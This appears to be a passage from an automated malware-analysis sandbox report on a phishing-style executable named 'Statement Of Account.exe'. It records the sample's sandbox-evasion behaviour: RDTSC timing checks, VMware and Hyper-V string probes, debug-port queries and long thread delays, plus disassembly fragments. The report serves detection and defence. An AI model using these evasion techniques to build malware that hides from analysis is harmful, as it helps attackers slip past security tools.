          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          barindex
          Yara detected AntiVM3
          Source: Yara matchFile source: Process Memory Space: SdYCcXyq.exe PID: 7408, type: MEMORYSTR
          Tries to detect virtualization through RDTSC time measurements
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRDTSC instruction interceptor: First address: 409B7E second address: 409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 27B9904 second address: 27B990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 2C49904 second address: 2C4990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\cmstp.exeRDTSC instruction interceptor: First address: 27B9B7E second address: 27B9B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\colorcpl.exeRDTSC instruction interceptor: First address: 2C49B7E second address: 2C49B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: 14A0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: 3120000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: 1710000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: 7C40000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: 8C40000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: 8DE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: 9DE0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: A310000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\Desktop\Statement Of Account.exeMemory allocated: B310000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: DA0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: 2AC0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: 4AC0000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: 7400000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: 6E00000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: 8400000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: 9400000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: 9820000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: A820000 memory reserve | memory write watchJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeMemory allocated: B820000 memory reserve | memory write watchJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E0D0 rdtsc 8_2_00F6E0D0
          Source: C:\Users\user\Desktop\Statement Of Account.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8179Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1059Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7517Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1888Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 2015Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 7921Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 877Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 862Jump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exeWindow / User API: threadDelayed 472
          Source: C:\Windows\SysWOW64\cmstp.exeWindow / User API: threadDelayed 9498
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 0.8 %
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeAPI coverage: 6.2 %
          Source: C:\Users\user\Desktop\Statement Of Account.exe TID: 6812Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1868Thread sleep count: 8179 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7304Thread sleep time: -7378697629483816s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2504Thread sleep count: 1059 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7252Thread sleep time: -1844674407370954s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7316Thread sleep time: -6456360425798339s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7292Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7960Thread sleep count: 2015 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7960Thread sleep time: -4030000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7960Thread sleep count: 7921 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7960Thread sleep time: -15842000s >= -30000sJump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe TID: 7428Thread sleep time: -922337203685477s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844Thread sleep count: 472 > 30
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844Thread sleep time: -944000s >= -30000s
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844Thread sleep count: 9498 > 30
          Source: C:\Windows\SysWOW64\cmstp.exe TID: 7844Thread sleep time: -18996000s >= -30000s
          Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\cmstp.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\Statement Of Account.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NECVMWar VMware SATA CD00\w
          Source: explorer.exe, 00000009.00000000.1714988461.00000000078A0000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
          Source: explorer.exe, 00000009.00000000.1723152883.00000000098A8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
          Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
          Source: explorer.exe, 00000009.00000002.2942465733.00000000079FB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000009.00000000.1723152883.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000009.00000002.2942465733.00000000078AD000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: NXTTAVMWare
          Source: explorer.exe, 00000009.00000000.1721919184.0000000009815000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
          Source: explorer.exe, 00000009.00000000.1721919184.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1721919184.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000002.2946201505.000000000982D000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000009.00000000.1723152883.0000000009977000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
          Source: explorer.exe, 00000009.00000002.2942465733.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000009.00000000.1714988461.0000000007A34000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWen-GBnx
          Source: explorer.exe, 00000009.00000002.2946201505.0000000009660000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
          Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
          Source: explorer.exe, 00000009.00000002.2937710239.0000000001240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\cmstp.exeProcess queried: DebugPort
          Source: C:\Windows\SysWOW64\colorcpl.exeProcess queried: DebugPort
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6E0D0 rdtsc 8_2_00F6E0D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB2AD0 NtReadFile,LdrInitializeThunk,8_2_00FB2AD0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6C0F0 mov eax, dword ptr fs:[00000030h]8_2_00F6C0F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FB20F0 mov ecx, dword ptr fs:[00000030h]8_2_00FB20F0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov eax, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101E10E mov ecx, dword ptr fs:[00000030h]8_2_0101E10E
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A0E3 mov ecx, dword ptr fs:[00000030h]8_2_00F6A0E3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01030115 mov eax, dword ptr fs:[00000030h]8_2_01030115
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101A118 mov ecx, dword ptr fs:[00000030h]8_2_0101A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h]8_2_0101A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h]8_2_0101A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0101A118 mov eax, dword ptr fs:[00000030h]8_2_0101A118
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F780E9 mov eax, dword ptr fs:[00000030h]8_2_00F780E9
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF60E0 mov eax, dword ptr fs:[00000030h]8_2_00FF60E0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF20DE mov eax, dword ptr fs:[00000030h]8_2_00FF20DE
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01004144 mov eax, dword ptr fs:[00000030h]8_2_01004144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01004144 mov eax, dword ptr fs:[00000030h]8_2_01004144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01004144 mov ecx, dword ptr fs:[00000030h]8_2_01004144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01004144 mov eax, dword ptr fs:[00000030h]8_2_01004144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01004144 mov eax, dword ptr fs:[00000030h]8_2_01004144
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F680A0 mov eax, dword ptr fs:[00000030h]8_2_00F680A0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01008158 mov eax, dword ptr fs:[00000030h]8_2_01008158
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044164 mov eax, dword ptr fs:[00000030h]8_2_01044164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01044164 mov eax, dword ptr fs:[00000030h]8_2_01044164
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F7208A mov eax, dword ptr fs:[00000030h]8_2_00F7208A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01014180 mov eax, dword ptr fs:[00000030h]8_2_01014180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01014180 mov eax, dword ptr fs:[00000030h]8_2_01014180
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102C188 mov eax, dword ptr fs:[00000030h]8_2_0102C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0102C188 mov eax, dword ptr fs:[00000030h]8_2_0102C188
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F9C073 mov eax, dword ptr fs:[00000030h]8_2_00F9C073
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F72050 mov eax, dword ptr fs:[00000030h]8_2_00F72050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00FF6050 mov eax, dword ptr fs:[00000030h]8_2_00FF6050
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010361C3 mov eax, dword ptr fs:[00000030h]8_2_010361C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010361C3 mov eax, dword ptr fs:[00000030h]8_2_010361C3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6A020 mov eax, dword ptr fs:[00000030h]8_2_00F6A020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F6C020 mov eax, dword ptr fs:[00000030h]8_2_00F6C020
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_010461E5 mov eax, dword ptr fs:[00000030h]8_2_010461E5
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h]8_2_00F8E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h]8_2_00F8E016
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_00F8E016 mov eax, dword ptr fs:[00000030h]8_2_00F8E016
